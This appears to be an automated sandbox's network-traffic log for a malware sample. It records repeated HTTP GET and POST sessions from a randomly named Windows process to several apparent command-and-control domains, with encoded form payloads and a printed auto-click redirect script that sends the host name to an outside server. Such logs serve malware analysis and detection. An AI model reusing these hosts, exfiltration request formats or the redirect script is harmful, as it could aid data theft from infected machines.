                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED]
                                                                            Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                            Session ID: 6
                                                                            Source IP: 192.168.2.8   Source Port: 49716
                                                                            Destination IP: 23.225.160.132   Destination Port: 80
                                                                            PID: 5960
                                                                            Process: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jan 11, 2025 03:30:01.701118946 CET | 490 | OUT | GET /sgdd/?jNn=n1rc2pzYlnLUqZJmqzqSU8jwiNDNG2kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZSiHxO15Gr8xk7hOHDVFXExJKBXBlW4uFPtlrZZXFJuvZOA==&3P=ZxaxIFQ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.laohub10.net
                                                                            Connection: close
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Jan 11, 2025 03:30:02.201824903 CET | 533 | IN | HTTP/1.1 200 OK
                                                                            Server: Apache
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Accept-Ranges: bytes
                                                                            Cache-Control: max-age=86400
                                                                            Age: 1
                                                                            Connection: Close
                                                                            Content-Length: 358
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED]
                                                                            Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                            Session ID: 7
                                                                            Source IP: 192.168.2.8   Source Port: 49717
                                                                            Destination IP: 149.88.81.190   Destination Port: 80
                                                                            PID: 5960
                                                                            Process: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jan 11, 2025 03:30:07.762860060 CET | 745 | OUT | POST /rq1s/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.xcvbj.asia
                                                                            Origin: http://www.xcvbj.asia
                                                                            Referer: http://www.xcvbj.asia/rq1s/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 204
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Data Raw: 6a 4e 6e 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 6d 73 79 56 74 71 48 67 47 4a 33 6e 30 6e 2b 6c 65 58 2f 62 76 58 31 6d 69 43 48 37 42 35 53 36 6b 4e 68 56 4e 47 75 73 65 31 2f 31 6d 36 6f 63 4f 4d 76 6e 76 7a 63 4d 5a 30 45 53 76 6e 6b 31 39 79 59 67 31 42 33 73 61 6f 32 67 79 70 45 6e 64 71 2f 74 6f 42 30 53 79 43 57 4e 41 73 4c 51 71 74 6f 74 61 57 59 77 68 32 31 73 51 75 57 64 76 6e 6b 4e 4b 53 7a 42 4f 4b 79 47 6e 64 46 75 49 61 44 48 2f 41 2b 44 38 4a 79 39 2b 58 4c 35 75 68 6e 4a 30 4c 71 50 6b 32 47 68 58 69 73 76 6d 4e 52 31 51 61 34 64 4d 37 33 53 4c 49 71 61 43 6f 37 67 4b 49 38 4f 41 51 3d
                                                                            Data Ascii: jNn=xj4K+ejgT/JOWmsyVtqHgGJ3n0n+leX/bvX1miCH7B5S6kNhVNGuse1/1m6ocOMvnvzcMZ0ESvnk19yYg1B3sao2gypEndq/toB0SyCWNAsLQqtotaWYwh21sQuWdvnkNKSzBOKyGndFuIaDH/A+D8Jy9+XL5uhnJ0LqPk2GhXisvmNR1Qa4dM73SLIqaCo7gKI8OAQ=


                                                                            Session ID: 8
                                                                            Source IP: 192.168.2.8   Source Port: 49718
                                                                            Destination IP: 149.88.81.190   Destination Port: 80
                                                                            PID: 5960
                                                                            Process: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jan 11, 2025 03:30:10.317536116 CET | 765 | OUT | POST /rq1s/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.xcvbj.asia
                                                                            Origin: http://www.xcvbj.asia
                                                                            Referer: http://www.xcvbj.asia/rq1s/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 224
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Data Raw: 6a 4e 6e 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 48 63 79 55 4d 71 48 6f 47 4a 34 69 30 6e 2b 77 75 58 7a 62 76 62 31 6d 6a 32 58 37 55 52 53 6a 41 42 68 62 70 61 75 67 2b 31 2f 39 47 36 70 53 75 4d 6b 6e 76 32 70 4d 59 59 45 53 72 50 6b 31 2f 36 59 68 47 70 30 75 4b 6f 6a 35 43 70 47 6a 64 71 2f 74 6f 42 30 53 79 6e 37 4e 42 49 4c 4d 4c 64 6f 73 37 57 62 7a 68 32 79 72 51 75 57 5a 76 6e 67 4e 4b 53 30 42 4c 54 36 47 6b 31 46 75 49 4b 44 47 75 41 2f 5a 73 4a 38 35 2b 57 65 35 64 56 6a 42 57 2f 6b 53 43 6d 46 6d 30 4b 75 71 51 38 37 76 79 53 2b 65 4d 54 63 53 49 67 63 66 31 31 54 36 70 59 4d 51 58 47 4c 64 38 4e 55 69 67 6f 71 51 36 72 69 58 4d 6d 58 46 6a 64 74
                                                                            Data Ascii: jNn=xj4K+ejgT/JOWHcyUMqHoGJ4i0n+wuXzbvb1mj2X7URSjABhbpaug+1/9G6pSuMknv2pMYYESrPk1/6YhGp0uKoj5CpGjdq/toB0Syn7NBILMLdos7Wbzh2yrQuWZvngNKS0BLT6Gk1FuIKDGuA/ZsJ85+We5dVjBW/kSCmFm0KuqQ87vyS+eMTcSIgcf11T6pYMQXGLd8NUigoqQ6riXMmXFjdt


                                                                            Session ID: 9
                                                                            Source IP: 192.168.2.8   Source Port: 49719
                                                                            Destination IP: 149.88.81.190   Destination Port: 80
                                                                            PID: 5960
                                                                            Process: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jan 11, 2025 03:30:12.858727932 CET | 1782 | OUT | POST /rq1s/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.xcvbj.asia
                                                                            Origin: http://www.xcvbj.asia
                                                                            Referer: http://www.xcvbj.asia/rq1s/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 1240
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Data Raw: 6a 4e 6e 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 48 63 79 55 4d 71 48 6f 47 4a 34 69 30 6e 2b 77 75 58 7a 62 76 62 31 6d 6a 32 58 37 55 4a 53 2f 6c 64 68 55 6f 61 75 68 2b 31 2f 69 32 36 73 53 75 4d 35 6e 72 61 6c 4d 5a 6b 55 53 74 4c 6b 30 61 32 59 77 48 70 30 30 61 6f 6a 6b 79 70 4c 6e 64 72 39 74 6f 52 4b 53 79 58 37 4e 42 49 4c 4d 49 56 6f 39 71 57 62 2f 42 32 31 73 51 75 4b 64 76 6d 33 4e 4b 61 43 42 4c 65 59 47 56 56 46 74 6f 36 44 46 63 34 2f 53 73 4a 2b 31 65 58 64 35 64 49 39 42 57 7a 4f 53 43 37 67 6d 33 71 75 6f 32 70 57 31 79 57 32 48 38 50 6f 5a 4a 4d 76 66 57 51 78 33 4f 31 35 55 56 2f 70 63 4d 4a 64 6c 78 6f 59 55 61 4b 4c 41 49 54 43 50 6d 73 79 4d 5a 63 34 78 6f 46 68 65 6f 69 63 4b 49 55 2f 6c 50 65 43 50 76 71 73 6b 6a 46 72 79 39 64 69 39 66 58 78 31 77 53 74 4b 42 6b 2f 57 42 46 34 50 61 47 37 4f 77 47 75 74 30 34 35 70 42 38 75 2b 7a 4d 37 38 64 37 52 2b 56 76 32 35 51 37 6d 58 32 58 71 6e 4c 54 55 51 4b 46 65 38 4a 39 4e 6e 38 2f 44 66 6e 2b 37 43 2f 34 2b 6a 58 71 6c 46 53 [TRUNCATED]
                                                                            Data Ascii: jNn= [TRUNCATED]


                                                                            Session ID: 10
                                                                            Source IP: 192.168.2.8   Source Port: 49720
                                                                            Destination IP: 149.88.81.190   Destination Port: 80
                                                                            PID: 5960
                                                                            Process: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jan 11, 2025 03:30:15.404853106 CET | 488 | OUT | GET /rq1s/?jNn=8hQq9qCyJ4Zif0saVOr0qkV3vmys7vn3Uoj6jh6BmUV+5nttWKyOk55u+nexa6w5x5vVR/Acbsni3tLbmGpF1bV5lTdIrZK4z5JaRyWkNAYPXYBCqbiI2n7IpSyVWea/Pg==&3P=ZxaxIFQ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.xcvbj.asia
                                                                            Connection: close
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            11 | 192.168.2.8 | 49723 | 85.159.66.93 | 80 | 5960 | C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jan 11, 2025 03:30:41.900368929 CET | 754 | OUT | POST /rum2/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.soainsaat.xyz
                                                                            Origin: http://www.soainsaat.xyz
                                                                            Referer: http://www.soainsaat.xyz/rum2/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 204
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Data Raw: 6a 4e 6e 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 48 76 61 4c 35 69 4c 4f 6e 76 2f 34 51 4c 46 73 55 76 70 33 64 52 50 66 41 65 6b 6c 74 38 6a 32 30 31 6b 36 42 69 4c 61 61 44 58 6c 41 33 53 6d 49 6d 59 33 68 71 72 33 43 6b 4e 56 6c 4b 37 37 64 73 77 31 48 49 73 30 52 4e 61 73 73 39 53 55 56 44 61 76 34 71 5a 4c 55 78 2b 46 64 58 4b 44 33 33 72 38 37 59 32 59 59 76 55 48 59 73 63 4a 6f 48 78 43 71 44 4b 5a 33 43 55 57 42 2f 36 77 57 65 4f 66 41 57 6f 4f 58 6f 79 69 55 6c 72 46 4b 4a 52 6f 35 56 2f 47 31 75 31 4b 5a 76 62 32 41 53 55 37 38 47 34 36 67 2f 62 71 4e 76 67 69 4f 70 44 73 6e 43 49 47 6e 45 3d
                                                                            Data Ascii: jNn=8OxGdHNGhDPGSHvaL5iLOnv/4QLFsUvp3dRPfAeklt8j201k6BiLaaDXlA3SmImY3hqr3CkNVlK77dsw1HIs0RNass9SUVDav4qZLUx+FdXKD33r87Y2YYvUHYscJoHxCqDKZ3CUWB/6wWeOfAWoOXoyiUlrFKJRo5V/G1u1KZvb2ASU78G46g/bqNvgiOpDsnCIGnE=


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            12 | 192.168.2.8 | 49724 | 85.159.66.93 | 80 | 5960 | C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jan 11, 2025 03:30:44.441673040 CET | 774 | OUT | POST /rum2/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.soainsaat.xyz
                                                                            Origin: http://www.soainsaat.xyz
                                                                            Referer: http://www.soainsaat.xyz/rum2/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 224
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Data Raw: 6a 4e 6e 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 6e 2f 61 4a 61 36 4c 62 58 76 38 33 77 4c 46 37 45 76 74 33 64 64 50 66 46 2b 30 6c 66 59 6a 31 56 46 6b 67 46 32 4c 5a 61 44 58 72 67 33 54 73 6f 6d 47 33 68 75 56 33 47 6b 4e 56 6c 75 37 37 66 45 77 31 51 63 76 6d 78 4e 45 6b 4d 39 51 61 31 44 61 76 34 71 5a 4c 55 31 55 46 65 6e 4b 45 48 48 72 39 65 30 31 56 34 76 58 41 59 73 63 43 49 48 31 43 71 44 53 5a 79 62 50 57 44 48 36 77 57 4f 4f 65 56 36 72 48 58 6f 30 2f 45 6c 31 4c 2f 77 31 74 49 6c 49 4c 56 71 46 44 2f 72 32 36 57 6a 2b 68 65 4f 2b 35 67 58 77 71 4f 48 57 6e 35 30 72 32 45 53 34 59 77 53 43 31 7a 6e 6f 2b 55 6b 76 72 69 42 55 53 42 34 5a 4d 65 56 62
                                                                            Data Ascii: jNn=8OxGdHNGhDPGSn/aJa6LbXv83wLF7Evt3ddPfF+0lfYj1VFkgF2LZaDXrg3TsomG3huV3GkNVlu77fEw1QcvmxNEkM9Qa1Dav4qZLU1UFenKEHHr9e01V4vXAYscCIH1CqDSZybPWDH6wWOOeV6rHXo0/El1L/w1tIlILVqFD/r26Wj+heO+5gXwqOHWn50r2ES4YwSC1zno+UkvriBUSB4ZMeVb


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            13 | 192.168.2.8 | 49725 | 85.159.66.93 | 80 | 5960 | C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jan 11, 2025 03:30:46.994822979 CET | 1791 | OUT | POST /rum2/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.soainsaat.xyz
                                                                            Origin: http://www.soainsaat.xyz
                                                                            Referer: http://www.soainsaat.xyz/rum2/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 1240
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Data Raw: 6a 4e 6e 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 6e 2f 61 4a 61 36 4c 62 58 76 38 33 77 4c 46 37 45 76 74 33 64 64 50 66 46 2b 30 6c 66 51 6a 31 6e 4e 6b 36 69 4b 4c 59 61 44 58 30 51 33 65 73 6f 6e 44 33 6c 43 52 33 47 67 33 56 6e 6d 37 39 4f 6b 77 69 52 63 76 2f 42 4e 45 6d 4d 39 54 55 56 43 61 76 34 61 6e 4c 55 46 55 46 65 6e 4b 45 42 4c 72 72 37 59 31 58 34 76 55 48 59 73 41 4a 6f 48 64 43 71 62 6f 5a 7a 4b 36 57 54 6e 36 78 79 53 4f 64 6e 69 72 49 58 6f 32 38 45 6b 6d 4c 2f 30 71 74 4c 42 45 4c 57 32 38 44 34 6e 32 34 51 32 71 78 65 57 70 76 68 50 6c 6e 4a 48 54 2b 70 77 66 35 6c 47 41 48 67 71 52 39 32 48 6c 2f 47 38 75 72 52 6b 46 51 32 45 64 4f 36 74 50 76 6f 47 57 67 74 67 52 63 42 78 52 52 75 58 35 68 58 64 54 58 57 35 36 30 42 6a 51 6a 71 7a 77 62 68 71 59 35 52 6b 57 46 2b 6a 35 66 5a 6e 62 4b 74 55 45 68 6e 54 50 35 39 44 4d 66 43 67 47 4f 64 75 42 62 65 35 5a 52 7a 61 48 4c 2b 43 48 44 47 46 34 6c 47 57 32 52 72 78 74 46 33 74 4e 35 30 41 55 79 4d 57 68 64 72 4e 2b 4d 6c 30 42 47 32 [TRUNCATED]
                                                                            Data Ascii: jNn=8OxGdHNGhDPGSn/aJa6LbXv83wLF7Evt3ddPfF+0lfQj1nNk6iKLYaDX0Q3esonD3lCR3Gg3Vnm79OkwiRcv/BNEmM9TUVCav4anLUFUFenKEBLrr7Y1X4vUHYsAJoHdCqboZzK6WTn6xySOdnirIXo28EkmL/0qtLBELW28D4n24Q2qxeWpvhPlnJHT+pwf5lGAHgqR92Hl/G8urRkFQ2EdO6tPvoGWgtgRcBxRRuX5hXdTXW560BjQjqzwbhqY5RkWF+j5fZnbKtUEhnTP59DMfCgGOduBbe5ZRzaHL+CHDGF4lGW2RrxtF3tN50AUyMWhdrN+Ml0BG2Mx4+s2XKBJvY+O+SvB23663qEOt3qjS+vU6Rd/L0O+Ds6+Hjklmo2r8AHORO5clcNBH5bMgkYpLkUOEvAD4sDScpJa+KcbbIC7ZBSqaALrbS71Rf4EbCmnPkatdzofAv3Odyzt3ObbKMhbb4lzJ4pPtO2EWMVPIWYZ/m23V6Sody2EFgjMHiaatSjcFnPW0N/+gyRPRPCrOKELQ4SQomWiJwJtor/HZNPLYJOz+A684QZd5ngRUX7AJYEUWW1XqsgDcBgw3Oz3IzAZpTSl6rqJ/806BhdCyB3b9KKjNwBaey+3oc7uYy0s/AoqMpal3CdUJrLvFYwdaySgfEXMkJri9TCjgGVxpMaat/C18IqOgyiIdmVHMG3OZ6692sS6psw8vU5hkccfK+IF1tBXP5xiSh7rQjoAM3VPzepcAToUVIY2tOxlalMz8vAiKRC27de3ScKTPmeDre2t6IQNeXmgWNWzuz7jS6IVvrKmR7IpzLvCoyXqzkxCt0nlI3V/yhU3W5avD9EAEfXLBJDeOMQlfm4CA1jT3ZJ46KtNjMtJbNH7/0z8iNltTi67vq69RzVDGTc+4SRp22c9bi4M1fhiyc9HdUv8/I1/yNUas3hoTRhj3urxRDJNwUJ8ibd59Yll0wnbxnD36Iw9hAOhpTon0MZUUKiJanAq [TRUNCATED]


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            14 | 192.168.2.8 | 49726 | 85.159.66.93 | 80 | 5960 | C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jan 11, 2025 03:30:49.544825077 CET | 491 | OUT | GET /rum2/?jNn=xMZmeyR85UPBdQXGVprUO1LR43iXmFfPz7pkSG2xpPpRtldOsCO9Ua+kpATSmsrk0H+UwmANflnCrdxtiygBnjZcvZIWQQve7723Pk1HFbXKcmbX65Etfa2fBZEFB8aOdg==&3P=ZxaxIFQ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.soainsaat.xyz
                                                                            Connection: close
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Jan 11, 2025 03:31:50.256149054 CET | 194 | IN | HTTP/1.0 504 Gateway Time-out
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            15 | 192.168.2.8 | 49727 | 185.27.134.144 | 80 | 5960 | C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jan 11, 2025 03:31:55.346839905 CET | 748 | OUT | POST /d9ku/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.amayavp.xyz
                                                                            Origin: http://www.amayavp.xyz
                                                                            Referer: http://www.amayavp.xyz/d9ku/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 204
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Data Raw: 6a 4e 6e 3d 6c 43 4f 75 5a 30 70 64 4d 4e 79 74 5a 57 4a 61 48 49 4b 66 4d 46 42 50 74 47 64 6d 78 6d 69 75 48 54 31 74 42 76 37 55 58 41 6c 63 6d 52 6f 59 75 43 61 68 63 33 63 46 51 57 71 72 41 30 4a 31 74 50 72 44 4e 43 50 61 69 4d 51 67 72 4e 5a 34 6c 74 4e 4b 4b 63 6e 6c 74 70 71 61 42 7a 39 4d 37 75 53 67 68 6e 55 6c 37 49 49 6e 64 4d 78 44 45 46 70 30 48 74 51 34 44 51 4e 70 6b 59 7a 62 38 4b 7a 6b 6b 6a 6c 4c 57 78 53 41 77 71 4b 37 6c 76 41 46 44 5a 45 6c 64 75 58 6d 36 45 42 6d 74 49 45 4f 62 48 33 4a 67 61 77 30 7a 4a 58 2b 33 55 4a 30 63 47 63 50 4e 55 70 34 4b 49 6e 70 62 51 41 4d 4c 64 4d 3d
                                                                            Data Ascii: jNn=lCOuZ0pdMNytZWJaHIKfMFBPtGdmxmiuHT1tBv7UXAlcmRoYuCahc3cFQWqrA0J1tPrDNCPaiMQgrNZ4ltNKKcnltpqaBz9M7uSghnUl7IIndMxDEFp0HtQ4DQNpkYzb8KzkkjlLWxSAwqK7lvAFDZElduXm6EBmtIEObH3Jgaw0zJX+3UJ0cGcPNUp4KInpbQAMLdM=
                                                                            Jan 11, 2025 03:31:55.938622952 CET | 682 | IN | HTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Date: Sat, 11 Jan 2025 02:31:55 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                            Cache-Control: no-cache
                                                                            Content-Encoding: br
